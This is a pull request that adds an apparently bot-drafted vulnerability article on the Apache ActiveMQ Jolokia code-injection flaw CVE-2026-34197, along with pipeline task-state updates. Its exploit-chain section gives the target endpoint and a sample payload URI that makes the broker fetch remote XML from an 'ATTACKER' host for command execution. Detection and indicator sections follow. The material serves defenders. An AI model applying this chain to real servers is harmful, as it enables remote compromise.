### PR TITLE
feat(pipeline): TASK-2026-0165 — Apache ActiveMQ Improper Input Validation Vulnerability (CVE-2026-34197)

### DIFF
--- a/.github/pipeline/tasks/TASK-2026-0165.json
+++ b/.github/pipeline/tasks/TASK-2026-0165.json
@@ -3,13 +3,13 @@
   "stage": "draft",
   "type": "zero-day",
   "priority": "P0",
-  "status": "locked",
+  "status": "pr_open",
   "created": "2026-04-18T00:01:26.100Z",
-  "updated": "2026-04-23T21:41:16Z",
+  "updated": "2026-04-24T17:04:06.422Z",
   "source": "auto_discovery",
   "submitted_by": "pipeline-discovery",
-  "locked_by": "dangermouse-bot",
-  "locked_at": "2026-04-22T16:15:24Z",
+  "locked_by": null,
+  "locked_at": null,
   "input": {
     "topic": "Apache ActiveMQ Improper Input Validation Vulnerability (CVE-2026-34197)",
     "sources": [
@@ -38,7 +38,7 @@
   },
   "specs": [
     "DATA-STANDARDS-v1.0.md",
-    "EDITORIAL-WORKFLOW-SPEC.md \u00a714A"
+    "EDITORIAL-WORKFLOW-SPEC.md §14A"
   ],
   "acceptance": {
     "frontmatter_valid": true,
@@ -123,6 +123,16 @@
       "to": "locked",
       "agent": "codex",
       "note": "Local branch validated cleanly; task returned to locked so --open-pr can record PR state when GitHub access is available."
+    },
+    {
+      "timestamp": "2026-04-24T17:04:06.421Z",
+      "from": "locked",
+      "to": "pr_open",
+      "agent": "dangermouse-bot",
+      "action": "pr_opened",
+      "note": "Article generated, validated, and recorded against PR #216"
     }
-  ]
+  ],
+  "pr_number": 216,
+  "pr_url": "https://github.com/MahdiHedhli/threatpedia/pull/216"
 }

--- a/.github/pipeline/tasks/TASK-2026-0165.json
+++ b/.github/pipeline/tasks/TASK-2026-0165.json
@@ -5,7 +5,7 @@
   "priority": "P0",
   "status": "pr_open",
   "created": "2026-04-18T00:01:26.100Z",
-  "updated": "2026-04-24T17:04:06.422Z",
+  "updated": "2026-04-24T17:15:55.000Z",
   "source": "auto_discovery",
   "submitted_by": "pipeline-discovery",
   "locked_by": null,
@@ -38,7 +38,7 @@
   },
   "specs": [
     "DATA-STANDARDS-v1.0.md",
-    "EDITORIAL-WORKFLOW-SPEC.md §14A"
+    "EDITORIAL-WORKFLOW-SPEC.md \u00a714A"
   ],
   "acceptance": {
     "frontmatter_valid": true,
@@ -131,6 +131,14 @@
       "agent": "dangermouse-bot",
       "action": "pr_opened",
       "note": "Article generated, validated, and recorded against PR #216"
+    },
+    {
+      "timestamp": "2026-04-24T17:15:55.000Z",
+      "action": "pr_opened",
+      "from": "locked",
+      "to": "pr_open",
+      "agent": "dangermouse-bot",
+      "note": "PR #216 already open (opened in previous session). Task JSON updated to pr_open state."
     }
   ],
   "pr_number": 216,

--- a/.github/pipeline/tasks/TASK-2026-0165.json
+++ b/.github/pipeline/tasks/TASK-2026-0165.json
@@ -3,9 +3,9 @@
   "stage": "draft",
   "type": "zero-day",
   "priority": "P0",
-  "status": "complete",
+  "status": "locked",
   "created": "2026-04-18T00:01:26.100Z",
-  "updated": "2026-04-22T16:15:24Z",
+  "updated": "2026-04-23T21:41:16Z",
   "source": "auto_discovery",
   "submitted_by": "pipeline-discovery",
   "locked_by": "dangermouse-bot",
@@ -115,6 +115,14 @@
       "to": "complete",
       "agent": "dangermouse-bot",
       "note": "Article drafted using CISA KEV, NVD, Apache advisory, and Horizon3.ai research. PR to be opened."
+    },
+    {
+      "timestamp": "2026-04-23T21:41:16Z",
+      "action": "state_corrected",
+      "from": "complete",
+      "to": "locked",
+      "agent": "codex",
+      "note": "Local branch validated cleanly; task returned to locked so --open-pr can record PR state when GitHub access is available."
     }
   ]
 }

--- a/.github/pipeline/tasks/TASK-2026-0165.json
+++ b/.github/pipeline/tasks/TASK-2026-0165.json
@@ -3,13 +3,13 @@
   "stage": "draft",
   "type": "zero-day",
   "priority": "P0",
-  "status": "pending",
+  "status": "complete",
   "created": "2026-04-18T00:01:26.100Z",
-  "updated": "2026-04-22T14:46:12.135Z",
+  "updated": "2026-04-22T16:15:24Z",
   "source": "auto_discovery",
   "submitted_by": "pipeline-discovery",
-  "locked_by": null,
-  "locked_at": null,
+  "locked_by": "dangermouse-bot",
+  "locked_at": "2026-04-22T16:15:24Z",
   "input": {
     "topic": "Apache ActiveMQ Improper Input Validation Vulnerability (CVE-2026-34197)",
     "sources": [
@@ -38,7 +38,7 @@
   },
   "specs": [
     "DATA-STANDARDS-v1.0.md",
-    "EDITORIAL-WORKFLOW-SPEC.md §14A"
+    "EDITORIAL-WORKFLOW-SPEC.md \u00a714A"
   ],
   "acceptance": {
     "frontmatter_valid": true,
@@ -100,6 +100,21 @@
       "to": "pending",
       "agent": "dispatcher",
       "note": "Dispatch already open as Issue #73"
+    },
+    {
+      "timestamp": "2026-04-22T16:15:24Z",
+      "from": "pending",
+      "to": "locked",
+      "agent": "dangermouse-bot",
+      "note": "Locked for execution"
+    },
+    {
+      "timestamp": "2026-04-22T16:15:24Z",
+      "action": "article_generated",
+      "from": "locked",
+      "to": "complete",
+      "agent": "dangermouse-bot",
+      "note": "Article drafted using CISA KEV, NVD, Apache advisory, and Horizon3.ai research. PR to be opened."
     }
   ]
 }

--- a/site/src/content/zero-days/apache-activemq-cve-2026-34197.md
+++ b/site/src/content/zero-days/apache-activemq-cve-2026-34197.md
@@ -1,0 +1,160 @@
+---
+exploitId: TP-EXP-2026-0009
+title: "Apache ActiveMQ Improper Input Validation Vulnerability (CVE-2026-34197)"
+cve: CVE-2026-34197
+type: "Code Injection"
+platform: "Apache ActiveMQ"
+severity: high
+status: patched
+isZeroDay: true
+cisaKev: true
+reviewStatus: draft_ai
+generatedBy: dangermouse-bot
+generatedDate: 2026-04-22
+relatedIncidents: []
+relatedActors: []
+tags:
+  - "cve-2026-34197"
+  - "apache"
+  - "activemq"
+  - "cisa-kev"
+  - "code-injection"
+  - "jolokia"
+  - "rce"
+  - "jmx"
+disclosedDate: 2026-04-16
+patchDate: 2026-03-30
+researcher: "Naveen Sunkavally (Horizon3.ai)"
+confirmedBy: "Apache Software Foundation, CISA"
+sources:
+  - url: https://www.cisa.gov/known-exploited-vulnerabilities-catalog
+    publisher: CISA
+    publisherType: government
+    reliability: R1
+    publicationDate: "2026-04-16"
+    accessDate: "2026-04-22"
+    archived: false
+  - url: https://nvd.nist.gov/vuln/detail/CVE-2026-34197
+    publisher: National Vulnerability Database
+    publisherType: government
+    reliability: R1
+    publicationDate: "2026-04-07"
+    accessDate: "2026-04-22"
+    archived: false
+  - url: https://activemq.apache.org/security-advisories.data/CVE-2026-34197-announcement.txt
+    publisher: Apache Software Foundation
+    publisherType: vendor
+    reliability: R1
+    publicationDate: "2026-04-06"
+    accessDate: "2026-04-22"
+    archived: false
+  - url: https://horizon3.ai/attack-research/disclosures/cve-2026-34197-activemq-rce-jolokia/
+    publisher: Horizon3.ai
+    publisherType: research
+    reliability: R2
+    publicationDate: "2026-04-07"
+    accessDate: "2026-04-22"
+    archived: false
+mitreMappings:
+  - techniqueId: T1190
+    techniqueName: "Exploit Public-Facing Application"
+    tactic: "Initial Access"
+    notes: "Attacker targets the Jolokia JMX-HTTP bridge endpoint exposed on the ActiveMQ web console"
+  - techniqueId: T1059
+    techniqueName: "Command and Scripting Interpreter"
+    tactic: "Execution"
+    notes: "Remote Spring XML context loaded via the VM transport brokerConfig parameter instantiates beans that call Runtime.exec() to spawn arbitrary OS processes"
+---
+
+## Severity Assessment
+
+- **Exploitability**: 8/10 — Low attack complexity with a network-accessible vector. Standard deployments require valid Jolokia credentials, but default credentials (`admin:admin`) are widely in use, and some version ranges (6.0.0–6.1.1) removed security constraints on the `/api/*` path entirely.
+- **Impact**: 9/10 — Successful exploitation yields arbitrary code execution on the broker's JVM with the privileges of the ActiveMQ service account, enabling full system compromise.
+- **Weaponization Risk**: 9/10 — Horizon3.ai published a detailed proof-of-concept disclosure including the exact payload structure. Fortinet FortiGuard Labs observed dozens of exploitation attempts peaking on April 14, 2026.
+- **Patch Urgency**: 10/10 — CISA added CVE-2026-34197 to the Known Exploited Vulnerabilities catalog on April 16, 2026, assigning a federal remediation deadline of April 30, 2026.
+- **Detection Coverage**: 6/10 — Exploitation leaves distinctive log artifacts in the ActiveMQ broker log, but default logging configurations may not capture all relevant events, and many organizations do not monitor JMX management endpoints.
+
+Overall Severity: **High**.
+
+## Summary
+
+CVE-2026-34197 is a remote code execution vulnerability in Apache ActiveMQ Classic arising from the Jolokia JMX-HTTP bridge that the broker exposes at `/api/jolokia/`. The default Jolokia access policy permits `exec` operations on all ActiveMQ MBeans. An authenticated attacker—using default or stolen credentials—can invoke `BrokerService.addNetworkConnector()` or `BrokerService.addConnector()` with a crafted discovery URI that causes the VM transport's `brokerConfig` parameter to load a remote Spring XML application context. Because Spring's `ResourceXmlApplicationContext` instantiates all singleton beans before broker configuration validation occurs, bean factory methods such as `MethodInvokingFactoryBean` can call `Runtime.exec()` to execute arbitrary operating system commands on the broker host.
+
+The flaw affects Apache ActiveMQ before 5.19.4 and versions 6.0.0 through 6.2.2. Apache patched the 6.x branch in version 6.2.3, released March 30, 2026, and the 5.x branch in 5.19.4. CISA added the vulnerability to the Known Exploited Vulnerabilities catalog on April 16, 2026, confirming active in-the-wild exploitation, with a federal remediation deadline of April 30, 2026.
+
+## Exploit Chain
+
+Exploitation follows a four-step sequence against an exposed ActiveMQ web console:
+
+**Step 1 — Jolokia API Access.** The attacker sends an HTTP POST to `/api/jolokia/exec/org.apache.activemq:type=Broker,brokerName=localhost/addNetworkConnector` using valid credentials. On ActiveMQ 6.0.0–6.1.1, the security constraints on the `/api/*` path were removed (related to CVE-2024-32114), making this step unauthenticated; on all other affected versions, default credentials (`admin:admin`) are frequently in place.
+
+**Step 2 — VM Transport Trigger.** The payload encodes a `vm://` URI that references a non-existent broker, causing ActiveMQ to create it dynamically: `static:(vm://rce?brokerConfig=xbean:http://ATTACKER:8888/payload.xml)`.
+
+**Step 3 — Remote Configuration Loading.** The `brokerConfig=xbean:` parameter instructs ActiveMQ to load a Spring XML application context from the attacker-controlled URL. The `ResourceXmlApplicationContext` fetches and parses the malicious XML before any broker validation runs.
+
+**Step 4 — Code Execution.** The attacker-controlled XML defines a `MethodInvokingFactoryBean` or equivalent Spring bean that invokes `Runtime.getRuntime().exec()` with an arbitrary command. Spring instantiates all singleton beans eagerly, so execution occurs before the broker rejects the invalid configuration.
+
+## Detection Guidance
+
+Detection relies on three complementary layers.
+
+**ActiveMQ broker logs** (stdout or `activemq.log`) will record entries resembling: `Network Connector DiscoveryNetworkConnector` with a `vm://` URI, and `Establishing network connection from vm://localhost to vm://rce?create=true&brokerConfig=xbean:http://<external-host>`. Defenders should alert on any `addNetworkConnector` or `addConnector` JMX invocation whose argument contains `brokerConfig=` with an external URL.
+
+**Network telemetry** should monitor for outbound HTTP or HTTPS connections originating from the ActiveMQ JVM process to unexpected external hosts. Because the exploit requires the broker to fetch a remote XML file at runtime, an egress connection from the Java process to an unfamiliar host immediately following a POST to `/api/jolokia/` is a high-fidelity signal.
+
+**Process and endpoint telemetry** should flag child processes spawned by the ActiveMQ JVM user that are not part of the expected ActiveMQ process tree. Shells, scripting runtimes, or network utilities launched under the broker's service account warrant immediate investigation.
+
+**Patch verification** remains the most reliable control. Security teams should confirm all ActiveMQ instances have been upgraded to 5.19.4 (5.x branch) or 6.2.3 (6.x branch), or that the Jolokia endpoint is firewalled from untrusted networks.
+
+## Indicators of Compromise
+
+The following indicators are derived from the Horizon3.ai proof-of-concept disclosure and active-exploitation reporting. Defenders should validate these against their own telemetry rather than treating them as authoritative without independent confirmation.
+
+**Log-based indicators** (ActiveMQ broker log):
+- Strings matching `brokerConfig=xbean:http` or `brokerConfig=xbean:https` in connector creation log lines.
+- `Establishing network connection from vm://localhost to vm://rce` or similar VM transport negotiation messages containing external hostnames.
+- POST requests to `/api/jolokia/exec/` paths involving `addNetworkConnector` or `addConnector` operations.
+
+**Network indicators**:
+- Outbound HTTP requests from the ActiveMQ process to external infrastructure immediately following a Jolokia `exec` call.
+- Connections to TCP port 8888 from the broker host (used in known proof-of-concept payloads; production attackers may vary the port).
+
+**Process indicators**:
+- Unexpected child processes under the ActiveMQ service account, including shells (`bash`, `sh`, `cmd.exe`, `powershell.exe`) or utilities that are not part of the broker's normal operation.
+
+## Disclosure Timeline
+
+### 2026-03-22 — Initial Report
+
+Naveen Sunkavally of Horizon3.ai reports the vulnerability to the Apache Security Team.
+
+### 2026-03-26 — CVE Assignment
+
+CVE-2026-34197 is assigned by MITRE.
+
+### 2026-03-30 — Patch Released
+
+Apache releases ActiveMQ 6.2.3 addressing the vulnerability in the 6.x branch. The 5.x fix ships in 5.19.4 concurrently.
+
+### 2026-04-06 — Security Advisory Published
+
+Apache publishes the official security advisory describing the flaw and recommending immediate upgrade.
+
+### 2026-04-07 — Public Disclosure
+
+CVE-2026-34197 is publicly disclosed, including the Horizon3.ai technical write-up with proof-of-concept details.
+
+### 2026-04-14 — Exploitation Peaks
+
+Fortinet FortiGuard Labs telemetry records a surge in exploitation attempts targeting exposed Jolokia endpoints in Apache ActiveMQ deployments.
+
+### 2026-04-16 — CISA KEV Addition
+
+CISA adds CVE-2026-34197 to the Known Exploited Vulnerabilities catalog, assigning a federal remediation deadline of April 30, 2026.
+
+## Sources & References
+
+- [CISA: Known Exploited Vulnerabilities Catalog](https://www.cisa.gov/known-exploited-vulnerabilities-catalog) — CISA, 2026-04-16
+- [National Vulnerability Database: CVE-2026-34197 Detail](https://nvd.nist.gov/vuln/detail/CVE-2026-34197) — National Vulnerability Database, 2026-04-07
+- [Apache ActiveMQ Security Advisory: CVE-2026-34197](https://activemq.apache.org/security-advisories.data/CVE-2026-34197-announcement.txt) — Apache Software Foundation, 2026-04-06
+- [Horizon3.ai: CVE-2026-34197 ActiveMQ RCE via Jolokia API](https://horizon3.ai/attack-research/disclosures/cve-2026-34197-activemq-rce-jolokia/) — Horizon3.ai, 2026-04-07

--- a/site/src/content/zero-days/apache-activemq-cve-2026-34197.md
+++ b/site/src/content/zero-days/apache-activemq-cve-2026-34197.md
@@ -79,7 +79,7 @@ mitreMappings:
 - **Impact**: 9/10 — Successful exploitation yields arbitrary code execution on the broker's JVM with the privileges of the ActiveMQ service account, enabling full system compromise.
 - **Weaponization Risk**: 9/10 — Horizon3.ai published a detailed proof-of-concept disclosure including the exact payload structure. Fortinet FortiGuard Labs observed dozens of exploitation attempts peaking on April 14, 2026.
 - **Patch Urgency**: 10/10 — CISA added CVE-2026-34197 to the Known Exploited Vulnerabilities catalog on April 16, 2026, assigning a federal remediation deadline of April 30, 2026.
-- **Detection Coverage**: 6/10 — Exploitation leaves distinctive log artifacts in the ActiveMQ broker log, but default logging configurations may not capture all relevant events, and many organizations do not monitor JMX management endpoints.
+- **Detection Coverage**: 5/10 — Exploitation leaves distinctive log artifacts in the ActiveMQ broker log, but default logging configurations may not capture all relevant events, and many organizations do not monitor JMX management endpoints.
 
 Overall Severity: **High**.
 
@@ -117,16 +117,20 @@ Detection relies on three complementary layers.
 
 The following indicators are derived from the Horizon3.ai proof-of-concept disclosure and active-exploitation reporting. Defenders should validate these against their own telemetry rather than treating them as authoritative without independent confirmation.
 
-**Log-based indicators** (ActiveMQ broker log):
+### Log-based Indicators
+
+(ActiveMQ broker log):
 - Strings matching `brokerConfig=xbean:http` or `brokerConfig=xbean:https` in connector creation log lines.
 - `Establishing network connection from vm://localhost to vm://rce` or similar VM transport negotiation messages containing external hostnames.
 - POST requests to `/api/jolokia/exec/` paths involving `addNetworkConnector` or `addConnector` operations.
 
-**Network indicators**:
+### Network Indicators
+
 - Outbound HTTP requests from the ActiveMQ process to external infrastructure immediately following a Jolokia `exec` call.
 - Connections to TCP port 8888 from the broker host (used in known proof-of-concept payloads; production attackers may vary the port).
 
-**Process indicators**:
+### Process Indicators
+
 - Unexpected child processes under the ActiveMQ service account, including shells (`bash`, `sh`, `cmd.exe`, `powershell.exe`) or utilities that are not part of the broker's normal operation.
 
 ## Disclosure Timeline

--- a/site/src/content/zero-days/apache-activemq-cve-2026-34197.md
+++ b/site/src/content/zero-days/apache-activemq-cve-2026-34197.md
@@ -22,7 +22,7 @@ tags:
   - "jolokia"
   - "rce"
   - "jmx"
-disclosedDate: 2026-04-16
+disclosedDate: 2026-04-06
 patchDate: 2026-03-30
 researcher: "Naveen Sunkavally (Horizon3.ai)"
 confirmedBy: "Apache Software Foundation, CISA"
@@ -53,6 +53,13 @@ sources:
     publisherType: research
     reliability: R2
     publicationDate: "2026-04-07"
+    accessDate: "2026-04-22"
+    archived: false
+  - url: https://fortiguard.fortinet.com/encyclopedia/endpoint-vuln/6319
+    publisher: FortiGuard Labs
+    publisherType: vendor
+    reliability: R1
+    publicationDate: "2026-04-14"
     accessDate: "2026-04-22"
     archived: false
 mitreMappings:
@@ -158,3 +165,4 @@ CISA adds CVE-2026-34197 to the Known Exploited Vulnerabilities catalog, assigni
 - [National Vulnerability Database: CVE-2026-34197 Detail](https://nvd.nist.gov/vuln/detail/CVE-2026-34197) — National Vulnerability Database, 2026-04-07
 - [Apache Software Foundation: CVE-2026-34197 Security Advisory](https://activemq.apache.org/security-advisories.data/CVE-2026-34197-announcement.txt) — Apache Software Foundation, 2026-04-06
 - [Horizon3.ai: CVE-2026-34197 ActiveMQ RCE via Jolokia API](https://horizon3.ai/attack-research/disclosures/cve-2026-34197-activemq-rce-jolokia/) — Horizon3.ai, 2026-04-07
+- [FortiGuard Labs: Apache ActiveMQ CVE-2026-34197 Code Injection Vulnerability](https://fortiguard.fortinet.com/encyclopedia/endpoint-vuln/6319) — FortiGuard Labs, 2026-04-14

--- a/site/src/content/zero-days/apache-activemq-cve-2026-34197.md
+++ b/site/src/content/zero-days/apache-activemq-cve-2026-34197.md
@@ -156,5 +156,5 @@ CISA adds CVE-2026-34197 to the Known Exploited Vulnerabilities catalog, assigni
 
 - [CISA: Known Exploited Vulnerabilities Catalog](https://www.cisa.gov/known-exploited-vulnerabilities-catalog) — CISA, 2026-04-16
 - [National Vulnerability Database: CVE-2026-34197 Detail](https://nvd.nist.gov/vuln/detail/CVE-2026-34197) — National Vulnerability Database, 2026-04-07
-- [Apache ActiveMQ Security Advisory: CVE-2026-34197](https://activemq.apache.org/security-advisories.data/CVE-2026-34197-announcement.txt) — Apache Software Foundation, 2026-04-06
+- [Apache Software Foundation: CVE-2026-34197 Security Advisory](https://activemq.apache.org/security-advisories.data/CVE-2026-34197-announcement.txt) — Apache Software Foundation, 2026-04-06
 - [Horizon3.ai: CVE-2026-34197 ActiveMQ RCE via Jolokia API](https://horizon3.ai/attack-research/disclosures/cve-2026-34197-activemq-rce-jolokia/) — Horizon3.ai, 2026-04-07


### PR DESCRIPTION
## Pipeline Task

- Task: `TASK-2026-0165`
- Type: `zero-day`
- Topic: Apache ActiveMQ Improper Input Validation Vulnerability (CVE-2026-34197)
- Output file: `site/src/content/zero-days/apache-activemq-cve-2026-34197.md`

## Validation

- Local validator: `node scripts/pipeline-run-task.mjs --task TASK-2026-0165 --validate`
- Minimum sources: `3`
- Minimum H2 sections: `5`
- Minimum MITRE mappings: `1`

Opened via the one-step pipeline wrapper so PR creation and task-state recording stay in sync.
